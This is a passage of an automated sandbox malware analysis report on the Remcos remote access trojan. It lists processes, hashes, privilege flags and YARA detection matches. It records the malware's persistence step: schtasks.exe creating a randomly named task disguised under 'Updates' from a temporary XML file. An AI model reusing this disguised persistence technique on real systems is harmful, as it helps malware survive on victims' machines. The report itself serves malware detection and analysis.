                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000017.00000002.2233130392.0000000002391000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000017.00000002.2233190842.00000000023C2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Analysis Process: schtasks.exe PID: 552 Parent PID: 3032

                                                                      General

                                                                      Start time:07:46:46
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp'
                                                                      Imagebase:0xa90000
                                                                      File size:179712 bytes
                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: remcos.exe PID: 1084 Parent PID: 3032

                                                                      General

                                                                      Start time:07:46:47
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low

                                                                      Analysis Process: remcos.exe PID: 2312 Parent PID: 3032

                                                                      General

                                                                      Start time:07:46:47
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                      Reputation:low

                                                                      Analysis Process: remcos.exe PID: 2108 Parent PID: 1388

                                                                      General

                                                                      Start time:07:46:49
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001D.00000002.2260417476.0000000002275000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Analysis Process: schtasks.exe PID: 1256 Parent PID: 2108

                                                                      General

                                                                      Start time:07:46:58
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp'
                                                                      Imagebase:0xa40000
                                                                      File size:179712 bytes
                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Analysis Process: remcos.exe PID: 1744 Parent PID: 2108

                                                                      General

                                                                      Start time:07:46:59
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Analysis Process: remcos.exe PID: 2396 Parent PID: 2108

                                                                      General

                                                                      Start time:07:47:00
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Analysis Process: remcos.exe PID: 884 Parent PID: 2108

                                                                      General

                                                                      Start time:07:47:00
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, Author: unknown

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >